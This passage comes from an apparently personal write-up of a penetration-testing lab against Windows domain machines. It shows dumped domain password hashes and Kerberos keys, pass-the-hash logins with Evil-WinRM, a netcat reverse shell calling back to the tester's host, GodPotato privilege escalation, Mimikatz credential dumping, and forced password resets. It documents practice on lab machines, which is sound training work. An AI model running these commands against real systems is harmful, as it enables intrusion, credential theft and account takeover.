POSEIDON$:1103:aad3b435b51404eeaad3b435b51404ee:01196f308a81e26264eb41dbb4b3e668:::
sub.poseidon.yzx\chen:1104:aad3b435b51404eeaad3b435b51404ee:c4ddb64252adfc9e0558353099ded495:::
sub.poseidon.yzx\jackie:1105:aad3b435b51404eeaad3b435b51404ee:cea6f34ba33ec67388a7bfba44d8f648:::
sub.poseidon.yzx\lisa:1106:aad3b435b51404eeaad3b435b51404ee:905ae9b4d957545fb7b9ea0c4333247b:::
GYOZA$:1107:aad3b435b51404eeaad3b435b51404ee:d14a49d1a69fe84da13a6ac39ac6d5dd:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:e2786e98a3205f9085ef7071d992422f735ce704f4ba5c29f65f25beed348228
Administrator:aes128-cts-hmac-sha1-96:b6593732b7ab7cecd59afadef15b4315
Administrator:des-cbc-md5:e0e03d58a15d315e
DC02$:aes256-cts-hmac-sha1-96:685e1ea1f554aef467f22ffe54952c001c832c464c5d739b525b1896cb1fcada
DC02$:aes128-cts-hmac-sha1-96:65629090b82e25515362b76e9c3197c1
DC02$:des-cbc-md5:70ef3d4526cda4f8
krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2
krbtgt:aes128-cts-hmac-sha1-96:b5d83edef61d3c3799047e208e13b2c7
krbtgt:des-cbc-md5:b95ee5a11c10d989
POSEIDON$:aes256-cts-hmac-sha1-96:2618b7c5368e0265beeb5ac94fc9aa5019b16756550165d31378f03d84b006f8
POSEIDON$:aes128-cts-hmac-sha1-96:69c985205083323653af6afce39caee3
POSEIDON$:des-cbc-md5:7545074cce61d9b9
sub.poseidon.yzx\chen:aes256-cts-hmac-sha1-96:f82ec7ba1f7bde73f1549522dde64ca50dd7ff961efcec17939e567a249da43f
sub.poseidon.yzx\chen:aes128-cts-hmac-sha1-96:cfe54b16b15b6b2ab05e29c668e3bd6a
sub.poseidon.yzx\chen:des-cbc-md5:e668b01cf4625ed6
sub.poseidon.yzx\jackie:aes256-cts-hmac-sha1-96:354f64fbc9d6c06dd0df7ebfc2f390c3c4b21f91eeef0e2e4d9f7208622d34a4
sub.poseidon.yzx\jackie:aes128-cts-hmac-sha1-96:5c1b868f3526bc69744ca24c4998ca6c
sub.poseidon.yzx\jackie:des-cbc-md5:7a0d760de0d3d01a
sub.poseidon.yzx\lisa:aes256-cts-hmac-sha1-96:c9f63c9c18b1cf994a0296106a91d61168e76f28a030e0e553dbdd27dd9834ef
sub.poseidon.yzx\lisa:aes128-cts-hmac-sha1-96:65e93d705fc16a2f47edd6925fc68739
sub.poseidon.yzx\lisa:des-cbc-md5:a2138cb9b319e673
GYOZA$:aes256-cts-hmac-sha1-96:26a2228be65080a4c2992c15f8dce665871e2136584c8feb46fc8a6efced7fc8
GYOZA$:aes128-cts-hmac-sha1-96:2c68a503faefc735e97144497c268c0f
GYOZA$:des-cbc-md5:fd54702c373bfbba
[*] Cleaning up... 

At this point I connect via Evil-WinRM as Administrator with his hash:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.162 -u '.\Administrator' -H '3bcdd818f7ec942ac91aa30d8db71927'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                               
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                            
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sub\administrator

I open an interactive shell:

PowerShell
*Evil-WinRM* PS C:\users\jackie\desktop\wintools\wintools> .\nc.exe 192.168.45.248 4466 -e cmd
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec
└─$ nc -nvlp 4466
listening on [any] 4466 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.166.162] 51592
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\users\jackie\desktop\wintools\wintools>

I retrieve the local.txt and proof.txt flags:

[screenshot: 002.png]


GYOZA

Enumeration

PORT       SERVICE       VERSION  NOTES
135/tcp    msrpc         -        MSRPC
139/tcp    netbios-ssn   -        SMB
445/tcp    microsoft-ds  -        SMB
5040/tcp   unknown       -        -
5985/tcp   wsman         -        OMI
7680/tcp   pando-pub     -        -
47001/tcp  winrm         -        WINRM

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.166.163
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 09:58 CET
Nmap scan report for 192.168.166.163
Host is up (0.069s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49675/tcp open  unknown


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -sC -sV -p135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670,49675 -oN alltcp.txt 192.168.166.163 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:09 CET
Nmap scan report for 192.168.166.163
Host is up (0.068s latency).

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-03T09:11:47
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Exploit

I use the credentials found on the machine 192.168.166.162:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.163 -u chen -p 'freedom'                   

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\chen\Documents> whoami
sub\chen
*Evil-WinRM* PS C:\Users\chen\Documents> 

I open an interactive shell:

PowerShell
*Evil-WinRM* PS C:\Users\chen\Documents> .\nc.exe -nlvp 4466 -e cmd
nc.exe : listening on [any] 4466 ...
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ nc 192.168.166.163 4466
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Users\chen\Documents>whoami
whoami
sub\chen

Privilege Escalation

I check the permissions of the user chen:

PowerShell
C:\Users\chen\Documents>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeTcbPrivilege                Act as part of the operating system       Enabled
SeShutdownPrivilege           Shut down the system                      Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
SeTimeZonePrivilege           Change the time zone                      Enabled

I exploit the SeImpersonatePrivilege privilege with GodPotato.

It is not possible to open a tunnel from the target machine to the Kali machine, so I proceed the other way round, opening a listener via GodPotato:

PowerShell
C:\Users\chen\Documents\wintools>godpotato-net4.exe -cmd "C:\Users\chen\Documents\wintools\nc.exe -nlvp 4499 -e cmd"

And connecting to it from Kali:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ nc 192.168.166.163 4499                 
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

Finally I retrieve the local.txt and proof.txt flags:

[screenshot: 003.png]

[screenshot: 004.png]

Post Privilege Escalation

I change the Administrator password for convenience in future logins:

PowerShell
C:\Users\chen\Documents\wintools>net user Administrator Aa.123456!
net user Administrator Aa.123456!
The command completed successfully.

I reconnect via Evil-WinRM as Administrator:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.163 -u Administrator -p 'Aa.123456!'

I run Mimikatz:

PowerShell
C:\Users\chen\Documents\wintools>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 327403 (00000000:0004feeb)
Session           : Service from 0
User Name         : lisa
Domain            : sub
Logon Server      : DC02
Logon Time        : 12/11/2024 9:14:57 PM
SID               : S-1-5-21-4168247447-1722543658-2110108262-1106
        msv :
         [00000003] Primary
         * Username : lisa
         * Domain   : sub
         * NTLM     : 905ae9b4d957545fb7b9ea0c4333247b
         * SHA1     : 469cc5a177cf467cc0bd5759ef046155c7434ce7
         * DPAPI    : d6dd3ca4075a7884d2cad98a6cea83c0
        tspkg :
        wdigest :
         * Username : lisa
         * Domain   : sub
         * Password : LisaWayToGo456
        kerberos :
         * Username : lisa
         * Domain   : SUB.POSEIDON.YZX
         * Password : LisaWayToGo456
        ssp :
        credman :
        cloudap :

[...]

mimikatz(commandline) # exit
Bye!

I find the following credentials:

  • lisa:LisaWayToGo456

I check, as SYSTEM, whether Sharphound can be used:

PowerShell
C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain sub.poseidon.yzx.


User accounts for \\dc02.sub.poseidon.yzx

-------------------------------------------------------------------------------
Administrator            chen                     DefaultAccount           
Guest                    jackie                   krbtgt                   
lisa                     
The command completed with one or more errors.

I create the file to upload to BloodHound:

PowerShell
C:\Users\chen\Documents\wintools>Sharphound.exe -c all,gpolocalgroup
Sharphound.exe -c all,gpolocalgroup

And I download it to Kali:

PowerShell
*Evil-WinRM* PS C:\Users\chen\Documents\wintools> download 20250103150943_BloodHound.zip

Info: Downloading C:\Users\chen\Documents\wintools\20250103150943_BloodHound.zip to 20250103150943_BloodHound.zip                                                                  
Info: Download successful!

I upload the file to BloodHound.

[screenshot: 005]

I change jackie's password as suggested by BloodHound:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ net rpc password 'jackie' 'Aa.123456!' -U "sub.poseidon.yzx"/"lisa"%"LisaWayToGo456" -S "192.168.166.162"

I use these credentials to access the DC02 machine.